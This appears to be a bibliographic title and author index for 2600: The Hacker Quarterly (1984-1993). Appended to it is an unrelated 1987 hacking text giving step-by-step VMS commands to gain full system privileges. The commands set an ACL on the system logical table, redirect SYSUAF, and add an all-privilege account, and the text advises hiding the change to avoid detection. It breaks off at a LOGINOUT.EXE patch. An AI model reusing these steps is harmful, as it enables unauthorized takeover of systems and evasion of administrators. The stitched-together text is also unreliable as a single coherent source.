Network 2000 Saga Continues             7(3):8  
Never Erase the Past                    10(3):19  
New British Phone Service~              3(7):55  
New Chip Helps Sprint~                  3(8):63  
New Developments                        4(2):18  
New Jersey Tops Taps~                   3(7):51  
New Payphone Service for Michigan~      3(11):87  
New Payphones Confuse Callers~          3(1):7  
New Phone System for Courthouse~        2(8):51  
New Revelations From Bell South         7(3):16  
New Tracking Device For Cars~           2(6):39  
New VAX Announced~                      3(1):7  
New Ways of Stealing Data~              3(3):19  
New York's Computer Law~                3(6):43  
New York's IMAS                         4(10):4  
News Roundup~                           10(4):42  
News Update ~                           10(2):45  
News Update~                            7(2):38  
News Update~                            7(1):23  
News~                                   6(3):14  
Nickname Listings In Small Town~        3(11):87  
No Data Protection for Hong Kong~       3(7):55  
No Dial-it Calls For Feds~              2(11):75  
No Hacking While Flying, Please~        1(2):9  
No More Free Info~                      1(6):3  
No More Redialing?~                     2(12):83  
North Carolina #1 in Hacking            3(12):91  
Northern To Destroy COs                 3(3):23  
NPA Countdown                           6(4):44  
NSA Chooses AT&T Computer~              2(7):47  
NSA Doesn't Feel Secure~                1(9):51  
NSA Drops DES~                          3(9):67  
NSA Memo                                5(3):20  
NSA Wants a New Chip                    3(10):79  
NSA Wants Better Phones~                1(10):57  
Numbers                                 3(2):13  
Numbers of Interest                     4(8):6  
Numbers...Long Since Changed            3(6):45  
Nynex Bumps Southwestern Bell~          3(6):47  
NYNEX Data                              6(4):9  
Nynex Voice Mail                        10(4):18  
Oh No, Not Again!~                      1(10):57  
On The Road Again: Portable Hacking     9(2):4  
One Angry Judge                         10(1):23  
One We Somehow Missed~                  1(11):63  
Operating With Difficulty               4(9):6  
Our Contest Winners                     7(4):32  
Our Ever-Changing World~                6(4):6  
Our Wishes For '86 and Beyond           2(12):81  
Out of the Inner Circle--A Review       2(6):34  
Outdials                                8(2):44  
Outside Loop Distribution Plant, or  
  Hands-On Experience                   5(3):4  
Overcharge Hunters Needed               3(1):3  
Overseas Pirates~                       2(4):21  
Pacific Cable Planned~                  2(11):79  
Paging For Free                         4(6):5  
Passageways to the Internet             10(4):32  
Patients May Get to Keep Phones~        3(5):39  
Pay Phone Causes Panic~                 3(2):11  
Pay Telephones Deregulated~             1(7):3  
PC Pictures~                            3(12):95  
Penetrating the Pentagon by Phone~      1(12):69  
Pennant Ties Up Phones                  3(10):75  
People Express to be Hacked to Pieces   2(5):25  
Pest Control~                           2(9):63  
Phone Booth Captures Man~               2(10):67  
Phone Booth Wins Again~                 3(1):3  
Phone Booths Mauled The Stolen~         3(8):59  
Phone Fraud in Governor's House~        3(8):59  
Phone Numbers Supplied by Readers       8(1):17  
Phone Phreak Fined~                     3(4):27  
Phone Service Via Radio Shack~          3(1):3  
Phone-in Registration for College~      2(9):59  
Phones                                  4(1):20  
Phones at High and Low Speeds~          2(12):87  
Phones in the Sky~                      1(11):63  
Phoning Home From Europe                4(5):9  
Phreak Roundups~                        2(2):9  
Phreaks Tie Up Lines~                   3(12):91  
Pitcairn Island Now On AT&T Net~        2(9):59  
Police Dept. Wants Cellular Phones~     2(11):79  
Police Hacker Cleared~                  2(5):27  
Poor Connection Starts Bomb Scare~      3(9):67  
Poor Service An Understatement~         3(10):79  
Porno Phone Service Busted~             2(6):35  
Portable VAXes!!!                       3(9):71  
PRIMOS: The Final Part                  7(2):14  
Prisoner Update                         8(2):46  
Prisoners Break Law~                    3(7):51  
Private Directories Soon to be  
  Available~                            1(9):51  
Private Sector Returning                3(1):1  
Private Sector Update~                  2(9):59  
Problems for New Pay Phones~            2(6):39  
Product Review: Do It Yourself Demon  
  Dialer Kit (Hack-Tic Technologies)    9(2):15  
Product Review: Speech Thing            9(4):45  
Product Review: TDD-8 DTMF Decoder      10(2):14  
Programs in BASIC                       3(1):5  
Protecting Your SSN                     8(3):18  
Psychology in the Hacker World          8(3):38  
Public Phone Secrecy~                   3(6):43  
Punching Pay Phones                     6(3):37  
Pure Cyberfiction, Says Mitnick         8(2):42  
Pursuit For People                      2(9):58  
Q & A                                   1(2):10  
"Q" and "Z" Controversy Rages~          3(11):83  
RCI & DMS-100 Bugs                      3(9):65  
Reach Out and Touch a Nuclear Weapons  
  Contractor                            4(3):2  
Reaching Out On Your Own                2(9):58  
Reagan Hangs Up on Kids~                2(5):27  
Real Important Frequencies              9(1):17  
Real Life War Games?~                   2(4):21  
Redemption for a Hacker~                2(3):15  
Remember....                            6(2):3  
REMOBS                                  6(3):32  
Reporters Steal Swiss Phones~           3(2):11  
Review: CO Magazine                     4(9):22  
Review: Hacker: The Computer Crime  
  Card Game                             9(1):36  
Review: Sneakers                        9(3):17  
Review: The Hacker Crackdown            9(3):21
Reviews: The 1989 Pirate Directory      6(2):42  
Ripoffs & Scams~                        6(1):36  
Robot Kills Man~                        2(4):21  
ROLM Phone System Creates a Nightmare   5(1):30  
Roman Hackers                           4(12):18  
RSTS For Beginners                      3(4):25  
RSTS: A Trick Or Two                    2(11):73  
Rural Customers Denied Access~          2(11):79  
Rural Radio Phones~                     3(8):63  
Rural Ultraphones~                      3(10):79  
'Santa Fraud'~                          2(4):21  
Satellite Jammers Jammed~               3(3):23
Saudi Arabian BBS List                  4(7):21  
Say Goodbye to Meter Readers~           2(6):39  
SBS Offers Toll-Free Service~           1(12):69  
Scanning For Calls                      6(2):22  
Sears Satellite Network~                1(10):57  
Secret Frequencies                      8(2):32  
Secret Service on Trial                 10(1):18  
Security Can Kill Creativity            3(10):75  
Security Numbers                        1(10):59  
Security Software~                      3(1):7  
SEIZED! 2600 Bulletin Board is  
Implicated in Raid on Jersey Hackers    2(8):49  
Sherwood Forest Shut Down by  
  Secret Service                        2(6):34  
Shopper's Guide to COCOTS               9(3):13  
Shower Phone?~                          3(5):35  
"Signature" On Video Transmitters~      3(9):67  
Silver Box Born in U.K.                 7(1):19  
Silver Pages~                           2(4):21  
Simplex Locks                           8(3):6  
Simplex Update and Corrections          8(4):21  
Social Interaction with Phones          4(12):17  
Software Makers Crash BBS~              3(10):79  
Some Cosmos Documentation That May Be  
  Useful                                4(2):6  
Some Facts on Supervision               3(9):65  
Some Numbers                            4(12):21  
Some Thoughts on "Garbage Picking"      1(2):10  
Some Words on Hacker Morality           2(6):34  
South African BBS's                     4(10):11  
Soviet BBS List                         8(1):16  
Soviet Computer Update~                 3(3):23  
Soviets Denied Computer Access~         3(3):19  
Spanish Phones--and what they don't do  6(2):36  
Springsteen Mania~                      2(11):75  
Sprint Unites with US Telcom~           3(2):15  
Sprint--Too Many Customers~             3(11):87  
SS Number Returned to Citizens~         3(7):51  
Still More on the World of COSMOS       4(3):10  
Sting Boards on the Rise~               3(5):39  
Stock Market Crash~                     3(6):47  
Students Bog Down Computer~             1(12):69  
Students Cause Havoc on Computer~       1(3):3  
Stuff You Should Be Interested In~      8(4):8  
Stumbling into Control on a VMS         4(1):6  
Super Crisis Alert System~              2(12):87  
Super Pay Phone~                        2(12):87  
Supercomputer Dialups~                  1(3):3  
Survey Results                          2(12):84  
Surveying the COSMOS                    2(2):8  
TAP: The Legend is Dead                 4(1):4  
TASS News Service~                      3(3):23  
Technology Nabs Hooky Players~          3(1):3  
Telco Rats On Government~               2(10):67
Teenagers Abuse "Party Line~"           3(2):11  
Telco News                              9(4):42  
Telco Offices                           10(2):36  
Telco Response                          4(10):6  
Telco Says "Pay for Tones"~             3(12):91
Telco Service Spawns Racist Banter~     2(12):83  
Telenet Addresses                       4(5):10  
Telenet Directory                       2(9):61  
Telenet Letter                          4(8):16  
Telephone Company Responds to Criticism  
  of Touch-tone Fees                    4(10):7  
Teller Machine Crime Coming~            1(4):3  
Test Numbers                            2(11):77  
Thai Phone Books a Hot Issue~           2(6):39  
The 516 Area Code in Detail             5(3):14  
The 707 Area Code                       7(1):44  
The Australian Phone System             9(1):31  
The Ballad of Captain Crunch            4(3):4  
The Basics: Divestiture: What Happened? 3(1):1  
The Class Struggle                      8(2):22  
The Cold Truth                          4(8):20  
The Computel Scoop                      3(5):34  
The Constitution of a Hacker            1(3):1  
The Dark Side of the Great Break-Up     1(6):4  
The Dark Side of Viruses                5(2):8  
The Day the Phone System REALLY Died    6(4):4  
The Death of COSMOS?                    6(3):13  
The Definitive ANAC Guide               7(3):39  
The Early Phreak Days                   2(11):80  
The Facts on 10698                      7(1):30  
The First 100% ESS State~               2(7):47  
The First Atomic Bomb                   1(3):4  
The Free Phones of Philly               3(7):50  
The Galactic Hacker Party               6(3):10  
The Ghost in the Machine~               3(8):59  
The Hacker "Threat"                     9(4):19  
The Hacker Video                        8(3):14  
The Hackers Guide to Area Code          1(8):47  
The History of ESS                      2(11):74  
The Infinity Transmitter--An Old Bug  
  that Had Its Time                     2(9):58  
The Latest~                             9(1):42  
The Magical Tone Box                    10(4):22  
The Neidorf/Phrack Trial: Day by Day    7(2):4  
The New "TAP"                           6(2):43  
The New LEC Order: Acronym City         8(1):42  
The Next Step in Custom Calling~        2(3):15  
The Person Numbers~                     1(3):3  
The Rise of the Computer State by David  
  Burnham Book Review                   1(8):44  
The Scariest Number in the World        1(12):68  
The Scoop on 911                        7(1):37  
The Scoop on Pen Registers~             3(2):11  
The Secrets of Mizar                    7(1):8  
The Simple Pleasures of a Step Office   1(5):1  
The Sprint Gestapo Strikes Again!       6(2):34  
The Summer Games of 87                  4(8):3  
The Telecom Informer                    4(10):8  
The Telecom Informer                    4(8):8  
The Telecom Informer                    4(9):8  
The Telecom Informer                    4(6):8  
The Telecom Informer                    4(5):8  
The Telecom Informer                    4(11):8  
The Telecom Informer                    4(4):8  
The Telecom Informer                    4(1):8  
The Telecom Informer                    4(12):8  
The Telecom Informer                    4(3):8  
The Telecom Informer                    4(2):8  
The Telecom Informer                    4(7):8  
The Terminus of Len Rose                8(1):11  
The Theory of 'Blue Boxing': their  
  history, how their used, their future 2(2):7  
The Trouble With Telemail               1(4):2  
The Truth Behind Those 9999 Numbers     1(1):4  
The View of A Fed                       9(2):38  
The Woes of Having a Small-Time Rural  
  Phone Company                         1(5):4  
The Word On the Street~                 7(4):36  
There are More Phones than Ever         3(3):23  
This Month At 2600                      3(4):30  
This Month at 2600                      3(3):22  
This Month's Mischief and Mayhem~       2(2):9  
This Month's Troublemakers~             2(3):15  
Those Horrible Hackers Strike Again     2(1):1  
Those Silly Codes                       4(10):14  
Tidbits~                                8(3):31  
Times Changing For Directory Assistance~1(2):9  
TINA Message Service~                   2(6):39  
Tips On Trashing                        6(2):32  
Toll Fraud Detection Techniques         7(1):12  
Toll Fraud Device                       10(2):42  
Toll Fraud: What the Big Boys are  
  Nervous About                         9(3):43  
Town on Hold During Strike~             3(7):51  
Trashing Alaska Style                   2(2):8  
Trashing: America's Source For  
  Information                           3(10):73  
Trick of the Month~                     1(2):9  
Trouble in the White House              10(1):12  
Trouble with 800 "Word Numbers"~        2(9):59  
True Colors                             10(3):9  
TRW Breached by Non-Hackers~            2(2):9  
TRW Credentials Lack Credibility        4(8):4  
TRW: Big Business is Watching You       1(7):5  
TV Blue Boxes~                          3(8):63  
Two Inch Thick Bill~                    2(10):67  
U. S. Secret Service Field Offices      9(4):12  
U.S. Phone Companies Face Built-In  
  Privacy Hole                          8(4):42  
UAPC Update                             6(4):45  
UNIX Password Hacker                    8(1):31  
UNIX Password Hacker: An Alternative  
  Approach                              9(1):18  
US and France Link Phones~              3(5):35  
US Social Security Prefixes             4(11):6  
Use of Wiretaps at Record Pace~         1(11):63  
Useful UNIX Programs                    8(3):44  
Using the Telephone                     9(3):36  
USPS Hacking                            8(3):32  
USPS Hacking Corrections                8(4):21  
USSR Computer Hungry~                   3(8):63  
Vehicle Identification Numbers          9(4):11  
Victimized by Crime Computers~          1(10):57  
Victory for Wiretap Victims~            1(5):3  
Video Review: Assorted Videos           10(2):40  
Video Telephone Invention~              1(12):69  
Violating A VAX                         3(7):49  
Virus Scanners Exposed                  9(1):9  
Vital Ingredients: Switching Centers  
  and Operators                         1(10):56  
VM/CMS Corrections                      5(1):8  
VMS--The Series Continues               3(2):9  
Voice Mail Hacking                      9(2):42  
Voice Mail Hacking...NYNEX Style        6(3):36  
Voice of Reagan Tortures Patients~      3(11):83  
War Game Addict~                        2(9):59  
Weathertrak Codes                       5(1):15  
What a White Box Can Do                 2(4):19  
What in the EFF?                        7(2):10  
What it's Like to be a Soviet Operator  5(4):30  
What's Going On With Phones/Computers   5(3):10  
Whats up~                               8(1):19  
When Hackers Ride Horses: A Review of  
  Cyberpunk                             8(2):42  
Where Have All the Hackers Gone?        8(2):4  
Where One Hacker Went (L)               8(3):24  
Whitehouse Extension Numbers            1(1):5  
Who Called the Shuttle?~                3(3):19  
Who the Hell was Almon Strowger, Anyway?5(3):9  
Who Wants to be Swept?~                 3(12):95  
Whoops [errata for 4(9)]                4(10):18  
Whose Strike Was That Anyway?           1(4):1  
Why Computers Get Snatched              2(8):54  
Why Won't They Listen?                  8(3):4  
Wireless Phones Spell Trouble~          1(1):3  
Wiretap City~                           1(3):3  
Wiretap Clarification (L)               7(3):30  
Wiretapping and Divestiture: A Lineman  
  Speaks Out                            2(1):1  
Word Numbers                            4(4):15  
Worldnet: Getting Closer Every Day      4(9):4  
WORM                                    6(2):38  
Wrath of God Strikes 2600               3(11):86  
Wrestlemania Pins Bell~                 3(5):39  
Write Protect Tabs Wrong~               3(2):15  
Yellow Scam~                            2(5):27  
"You Must First Dial a One..."~         1(7):7  
Your Own Private Centrex~               3(1):7 

2600 THE HACKER QUARTERLY 
Author Index: Volume 1 (1984) - Volume 10 (1993)
David Price

Authors are listed in the first column, titles and citations are
listed in the second column using the following format: 
V(N):P  V = Volume, N = Number, P = Page

910                        Elementary Switching  10(4):9
999, The                   High School Hacking  10(2):13
Abuse, Dr.                 Magnetic Strips  8(2):7
Advocate, The Devil's      Product Review: Do It Yourself Demon Dialer           
                            Kit  9(2):15
Advocate, The Devil's      Review: The Hacker Crackdown  9(3):21
Advocate, The Devil's      Review: Hacker: The Computer Crime Card Game          
                            9(1):36
Advocate, The Devil's      When Hackers Ride Horses: A Review of                 
                            Cyberpunk   8(2):42
Advocate, The Devil's      USPS Hacking  8(3):32
Agent 003, Boic            Hacking Packard  2(3):20
Agent 04, Phucked          Outside Loop Distribution Plant, or Hands-On
                            Experience  5(3):4
Agranoff, Mike             The Ballad of Captain Crunch  4(3):4
America, Mainstream        More VAX Tricks  4(5):4
Anonymous                  ANALYSIS: Gulf War Printer Virus  8(4):39
Anonymous                  Death of NYNEX Business Centers  8(2):11
Aristotle                  Voice Mail Hacking...NYNEX Style  6(3):36
B/Square & Mr. Upsetter    Building a DTMF Decoder  7(1):14
Baalzebub                  Violating A VAX  3(7):49
Bard, The                  High School Mac Hack  10(4):15
Bayonet                    Getting Your File...  10(1):42
Benedict, W. Ritchie       Book Review: The Devouring Fungus  9(2):40
Benedict, W. Ritchie       Book Review: Virtual Reality  10(4):37
Billsf                     True Colors  10(3):9
Billsf                     Hitchhiker Guide to the Phone System
                           Phreaking in the Nineties  9(2):10
Bluebox, Mark              The Truth Behind Those 9999 Numbers  1(1):4
Bootleg                    Cellular Magic  10(1):4
Bruce, Peter               Spanish Phones--and what they don't do                
                            6(2):36
Buggy, Orson               Banking from your Terminal--A Look at                 
                            PRONTO  2(7):42
Caller, Midnight           The Australian Phone System  9(1):31
Capone, Al                 Hacking on the Front Line  9(3):31
Catalyst, Cheshire         Hacking PC Pursuit  4(4):6
Catalyst, Cheshire         TAP: The Legend is Dead  4(1):4
Check, Parity              Meeting Advice  10(2):16
City, New Hack             The New LEC Order: Acronym City  8(1):42
Clayton, Noah              Converting a Tone Dialer into a Red Box         
                            7(3):32
Crazed Luddite & 
 Murdering Thug K001/Ra    An Algorithm for Credit Cards  7(3):42
Cruise-CTRL                An Overview of DSS1  10(3):36
DC                         More Conversion Tricks  8(3):43
Delam, Dr.                 Virus Scanners Exposed  9(1):9
Delam, Dr.                 Defeating Callback Verification  9(3):9
Dobbs, J.R. "Bob"          Building a Red Box  5(2):13
Dragon, The                Trashing: America's Source For Information            
                            3(10):73
Drake, John                England's Mass Announcements  4(9):10
Drake, John                A Trip to England  3(8):58
Drake, John                Book Review Nothing New in Computer                   
                            Underground by M. Harry  3(6):42
Drake, John                An Interview with Hugo Cornwall: British              
                            Hacker/Author  4(2):4
Drake, John                An Interview With the Chaos Computer Club
                            5(4):34
Drewl/Salivate             Changing Your Grades on A High School
                            Computer  10(3):34
Dust                       Crypt() Source Code  8(4):11
Dutton, Roland             Book Review: "The Hacker's Handbook"
                            4(2):15
Echo                       Acronyms A-G  10(1):34
Echo                       Acronyms H-R  10(2):20
Echo                       Acronyms S-X (no y or z)  10(3):44
Esper                      Mobile Frequencies  8(4):18
Estev, Paul G.             People Express to be Hacked to Pieces
                            2(5):25
Estev, Paul                Reviews: The 1989 Pirate Directory 6(2):42
Eye, Roving                Birth of a Low Technology Hacker  8(4):16
Eye, Roving                Growth of a Low Tech Hacker  9(4):17
Fed, The                   The View of A Fed  9(2):38
Felipe Rodriquez &
Rop, Gonggrijp             Stuff You Should Be Interested In~ 8(4):8
Firemonger                 Surveying the COSMOS  2(2):8
Foley, Dan                 The Telecom Informer  4(6):8
Foley, Dan                 The Telecom Informer  4(3):8
Foley, Dan                 The Telecom Informer  4(4):8
Foley, Dan                 The Telecom Informer  4(2):8
Foley, Dan                 The Telecom Informer  4(1):8
Freeman, John              The Telecom Informer  4(5):8
Fresco, Al                 The Telecom Informer  4(9):8
Frosty of the GCMS         Fascinating fone fun  9(1):45
Frosty of the GCMS         A Batch Virus  9(1):8
FyberLyte                  The Magical Tone Box  10(4):22
G.R.A.S.P., Crisp          A Guide to the 5ESS  10(2):4
Galaxy, Mister             ANSI Bomb  10(2):44
Gam, Tamlyn                Silver Box Born in U.K.  7(1):19
Gamma, Bob                 Are You a Phreak???  2(3):13
Gerard, Judas              More Cellular Fun  10(3):42
Glitch, The                Cellular Update  5(3):8
Goldstein                  The Telecom Informer  4(7):8
Goldstein, Emmanuel        A Pen Register For Phreaks?: Product
                            Review--Dialed Number Recorder 4(5):22
Goldstein                  The Telecom Informer  4(10):8
Goldstein                  The Telecom Informer  4(8):8
Goldstein, Emmanuel        FBI Revealed: Reviews--"The FBI Project
                            Newsletter" & "The FBI and Your BBS" 4(8):9
Goldstein, Emmanuel        Never Erase the Past  10(3):19
Goldstein, Emmanuel        Review: Sneakers  9(3):17
Goldstein, Emmanuel        The Scoop on 911  7(1):37
Goldstein, Emmanuel        The New "TAP"  6(2):43
Goldstein, Emmanuel        Video Review: Assorted Videos  10(2):40
Goldstein, Emmanuel        New Revelations From Bell South  7(3):16
Grapefruit, Rancid         A Reader's Reply to Captain Zap  5(2):16
Gray, Jeff                 WORM  6(2):38
Greek, The                 International NUA's  4(10):10
Greek, The                 South African BBS's  4(10):11
Greenberg, Ross M.         A Form of Protection For You and Your
                            Computer  5(2):4
Guru, VM                   VM/CMS Corrections  5(1):8
Guy, The GCI               Trashing Alaska Style  2(2):8
Hackers, Legion of         Telenet Addresses  4(5):10
Hank@Taunivm.Bitnet        Worldnet: Getting Closer Every Day  4(9):4
Hibbert, Chris             Protecting Your SSN  8(3):18
Hobbit, The                Getting the Most Out of Equal Access  4(3):6
Holmes, Chester            An American Express Phone Story  3(3):17
Holmes, Chester            The Free Phones of Philly  3(7):50
Howard                     The Infinity Transmitter--An Old Bug that
                            Had Its Time  2(9):58
Icom, Mr.                  A Review of "The 'Top Secret' Registry of US
                            Government Radio Frequencies"  4(11):7
Inconnu, Les               Product Review: TDD-8 DTMF Decoder 10(2):14
Infidel, The               How Payphones Really Work  6(1):30
Infidel, The               REMOBS  6(3):32
Infidel, The               UNIX Password Hacker  8(1):31
Infidel, The               Exchange List: 201 Area Code  6(2):20
Infiltrator                A Simple Virus in C  9(3):19
Jaffee, Walter S.          Hacking Computer Shows  10(4):16
Jockey, Disk               US Social Security Prefixes  4(11):6
Jockey, Keyboard           UNIX Password Hacker: An Alternative
                            Approach  9(1):18
Judicator of D.C.          More Meeting Advice  10(4):35
Kevin                      Internet Outdials  8(1):40
Kid, the & Co.             How to Get into a C.O.  2(3):14
Kid, the & Co.             Knowing UNIX  3(8):57
Kid, The & Co.             Some Facts on Supervision  3(9):65
Kingpin, 617 & 
 RDT Syndicate             Cellular Phone Biopsy  10(4):6
Knight, Red                More On Hacking UNIX  6(4):4
Knight, The Dark           British News  10(1):44
Knight, Red                A Hacker's Guide to UNIX  5(4):12
Kurtz, Colonel Walter E.   Class Features  8(4):31
Lineman, The               Phoning Home From Europe  4(5):9
Lurch, The                 707 Area Code  7(1):44
Luthor, Lex                The History of ESS  2(11):74
Luthor, Lex                Telenet Directory  2(9):61
Luthor, Lex & The LOD      History of British Phreaking  1(9):49
Luthor, Lex                Where One Hacker Went (L)  8(3):24
Luthor, Lex  & The LOD     Fun With COSMOS  2(12):82
Luthor, Lex  & the LOD     More Info on VMS  2(10):66
Luthor, Lex  & The Legion 
 of Hackers                Hacking IBM's VM/CMS--Part Two  4(12):4
Luthor, Lex  & The LOD     Final Words on VMS  3(3):18
Luthor, Lex  & The LOD     A Guide to VMS  2(9):57
Luthor, Lex  & The Legion
 of Hackers                Hacking IBM's VM/CMS  4(11):4
Luthor, Lex  & The Legion 
 of Doom/Hackers           VMS--The Series Continues  3(2):9
Mac+                       New York's IMAS  4(10):4
MAD!                       Death of a Pay Phone  3(10):73
Man, Swinging              Hacking AmiExpress  9(3):4
Marauder, The              RSTS For Beginners  3(4):25
Marauder, The & The L.O.D. A Hacker's Guide to the TSPS
                            Console  4(6):6
Marauder, The &            
Phoneline Phantoms         RSTS: A Trick Or Two  2(11):73
Master, LNA                Listening In: Catch Me if you Can!  4(11):7
MechWariors, GCMS          U. S. Secret Service Field Offices  9(4):12
Menace, Hyperborean        Caller ID Technologies  10(3):12
Meyer, Gordon & Jim Thomas The Neidorf/Phrack Trial: Day by Day                  
                            7(2):4
Micro Surgeon /West Coast 
 Phreaks                   Punching Pay Phones  6(3):37
Mitnick, Kevin             Pure Cyberfiction, Says Mitnick  8(2):42
Mitnick, Kevin             Looking Up IBM Passwords  8(1):36
Mole, The                  Stumbling into Control on a VMS  4(1):6
Monk, The                  How to Take Apart A Payphone  9(1):20
Moon, Electric             A True Saga of Teleconferencing  1(4):4
Mouse, MCI                 Hacking MCIMAX  8(2):16
Murphy, Dan                Review: CO Magazine  4(9):22
Nathan, Paco Xander        Secret Service on Trial  10(1):18
Neidorf, Craig             An Appeal For Help  8(4):36
Neidorf, Craig             The Terminus of Len Rose  8(1):11
NeurAlien                  Beginner's Guide to Minitel  9(4):8
Overlord, Dark             Lair of the INTERNET Worm  6(3):39
P., Larry                  The Sprint Gestapo Strikes Again!  6(2):34
Page, Bob                  A Report on the Internet Worm  5(4):4
Panda, Paranoid            In Pursuit of Knowledge: An Atari 520ST
                            Virus  8(1):4
Panda, Paranoid            An MS-DOS Virus  9(1):4
Phoenix, The               Beige Box Construction  10(1):14
Phorester, Dr. Clayton     Descrambling Cable  10(1):16
Phreak, Nynex              Numbers of Interest  4(8):6
Phreak, The Alaskan        (TAP)  Exploits in Operator Hell  3(5):33
Phreaker, Lord             Book Review: "Automatic Teller Machines III"
                            4(2):21
Phreaker, Cray-Z           Product Review: Speech Thing  9(4):45
Phreaker, Lord             An Interesting Diversion  2(10):65
Phreaker, Phantom &        
Doom Prophet & LOD!        Toll Fraud Detection Techniques  7(1):12
Plague, The                The Dark Side of Viruses  5(2):8
Plague, The                Grade "A" Hacking  6(3):4
Plague, The                NYNEX Data   6(4):9
Plague, The                UAPC Update  6(4):45
Plague, The                An Introduction to COCOTS  7(2):20
Plann, Marshall            Useful UNIX Programs  8(3):44
Prefect, Phord             Getting Started  9(3):42
PW                         Human Database Centers  8(4):46
"Q", The                   The Secrets of Mizar  7(1):8
Rabbit, Peter              Cipher Fun  9(4):6
Ranger, Night              Voice Mail Hacking  9(2):42
Ranger, Forest             Reaching Out On Your Own  2(9):58
Rat, Tech                  Hacking Smartphone  10(4):11
Rebel                      Know Your Switch  10(4):10
Reisman, Bruce             Telephone Company Responds to Criticism of
                            Touch-tone Fees  4(10):7
Researcher, The            Mobile Phones--Theory and Construction
                            3(4):26
Resz, Stepher J.           Book Review: Approaching Zero  10(3):38
RNOC, Bill From Legion 
 of Doom                   Still More on the World of COSMOS 4(3):10
Rocker, The Veteran Cosmic Saudi Arabian BBS List  4(7):21
Rome, Hal from             Roman Hackers  4(12):18
Runner, Net                Outdials  8(2):44
S., Bernie                 How to Defeat *69  9(2):31
S., Bernie                 AT&T Sub Maps  4(8):11
S., Bernie                 FAX: A New Hobby  4(5):14
S., Bernie                 Paging For Free  4(6):5
S., Bernie                 Cellular Phone Fraud and Where It's Headed
                            4(7):4
S., Bernie                 Secret Frequencies  8(2):32
Salerno, Mike              Getting In The Back Door: A Guide to Some
                            Popular Operating Systems  2(1):2
Scannon, Lou               Book Review: Tune in on Telephone Calls by
                            Tom Kneitel  5(4):45
Scientist, Mad             How to Use Your Silver Box  9(1):16
Severence, No              How Phone Phreaks are Caught  4(7):6
Shadow, The Knights of     Interesting Things to do on a DEC-20
                            2(7):41
Shadow, The                Wiretapping and Divestiture: A Lineman
                            Speaks Out  2(1):1
Shadow, The                How to Run a Successful Teleconference
                            2(5):26
Shadow, The                Test Numbers  2(11):77
Shadow, The                Equal Access May Not be "Equal" to Modems
                            2(11):74
Skinner, Scott             One Angry Judge  10(1):23
Skinner, Scott &    
 Emmanuel Goldstein        Simplex Locks  8(3):6
Solomenko, E.              What it's Like to be a Soviet Operator 5(4):30
Source, U. R.              How to Hack Honesty  10(3):20
Staff                      The Telecom Informer  4(11):8
Statton, Scott             Ever Wonder Who Owns All Those 800 Numbers?
                            6(1):12
Steal, Agent               Central Office Operations  7(4):12
Strowger, Almon, Jr.       Who the Hell was Almon Strowger, Anyway?
                            5(3):9
Switchman, Silent          And They Call US Crooks?  2(10):65
Switchman, Silent          Here's the Secret!  2(11):73
Taylor, Dave               Social Interaction with Phones  4(12):17
TELEgodzilla               Our Contest Winners  7(4):32
The Kid & Co. &     
The Shadow                 More on Trashing: What to Look for, How to
                            Act, Where to Go.  1(9):50
"The Snake", Jake          Caller ID: The Facts  7(3):5
Thunder, Lord              Defeating Trap Tracing  7(3):22
Toad, Texas                Capturing Passwords  4(8):10
Tommy                      BASIC Red Box Tones  5(3):22
Tommy                      Canadian WATS Phonebook  5(3):23
Upsetter, Mr.              Build A Tone Tracer  8(2):14
Upsetter, Mr.              Listening In  7(1):19
Upsetter, Mr.              Scanning For Calls  6(2):22
Upsetter, Mr.              How to Build a Silver Box  6(4):20
Valve, Rex                 TRW Credentials Lack Credibility  4(8):4
Velcro, Romula             Meeting Advice  10(2):17
Videosmith, The            CLASS: What It Means To Us  4(5):6
Violence                   A Guide to PRIMOS  6(2):4
Violence                   PRIMOS: The Final Part  7(2):14
Violence                   More Hacking on Primos  6(4):14
William, Sir               Some Cosmos Documentation That May Be
                            Useful  4(2):6
Williams, Dr.              Tips On Trashing  6(2):32
Williams, Dr.              Hardwiring Your Way In  5(4):42
Williams, Dr.              An Interview with Dorothy Denning  7(3):10
Williams, Dr.              Book Review: The Cuckoo's Egg  7(1):45
Williams, Dr.              A Study of Hackers  10(1):38
Wintermute                 Operating With Difficulty  4(9):6
Wood, Jim                  The Early Phreak Days  2(11):80
Woodstein, Condor          Psychology in the Hacker World  8(3):38
X, Alien                   A Way To Catch Peepers  9(1):35
Yuhas, Mike                Allnet: A Horror Story  4(6):4
Zap, Captain               An Interpretation of Computer Hacking 5(1):16
Zee, Charlie               Trouble in the White House  10(1):12
Zero, Count                Toll Fraud: What the Big Boys are Nervous
                            About  9(3):43
Zero, Count                Shopper's Guide to COCOTS  9(3):13

Getting System Privilege under VMS by Lightfinger (1987)

1.  To get SYSNAM privilege under V4.2, do the following:

$ SET ACL/OBJ=LOGICAL/ACL=(ID=[???,???],ACCESS=READ+WRITE+DELETE+CONTROL)
      LNM$SYSTEM_TABLE

and so on for each of the tables you need access to.  The weakness in this
VMS version is that although it allows ACLs on logical name tables, any user
can put them on!  [???,???] is your UIC.

 Alternatively, if you have another method of gaining the SYSNAM privilege,
you can do the following.

Now that you have this ACL, you should be able to add an entry for SYSUAF.
It has to be an executive-mode name, e.g.:

$ DEFINE/SYSTEM/EXEC SYSUAF $1$DISK1:[FRED]SYSUAF

If you have done a SET DEFAULT to [FRED] beforehand and then done this:

$ COPY SYS$SYSTEM:SYSUAF.DAT *

then you should be able to do:

$ RUN SYS$SYSTEM:AUTHORIZE

UAF>ADD FRED/PASS=FRED/PRIV=ALL/FLAG=NODISUSER

UAF>^Z

*EXIT*

 Note that from now on ANYONE logging onto the system will be checked
against the SYSUAF file in the [FRED] directory and NOT the one in the
SYS$SYSTEM directory.  Also, anyone doing a SHOW LOGICAL will see a new
entry in the system name table, i.e. "SYSUAF" = SYS$SYSDEVICE:[FRED]SYSUAF

It's now all ready to test.  Try:

$ SET HOST 0

Username: FRED
Password: FRED

And hey presto, you're logged in with FULL privileges.

Since an entry in the system logical name table is a fairly obvious giveaway
of who is hacking the system, it is a better idea to copy the SYSUAF file from
the system directory and ALTER your OWN account to have full privileges.  That
way no new USERNAME appears to arouse suspicion.

So write a DCL command procedure that will:
A. Get SYSNAM priv
B. Enter the new logical name into the system table
C. Login

and write a routine that is called from your login.com file that does:

A. Checks for the SYSUAF entry in the system table
B. Deletes it if it is present.

Doing this makes the new definition of SYSUAF visible only for a fraction of
a second, which is very difficult to trace.

You should now be logged into your own account with FULL privs.. magic
really.. (I have tested this method and it works really well!)

2.   Another approach (or an extension of the last method), if you can get
     write access to LOGINOUT.EXE in SYS$SYSTEM, is the following patch:

$SET DEFAULT SYS$SYSTEM:
$PATCH LOGINOUT

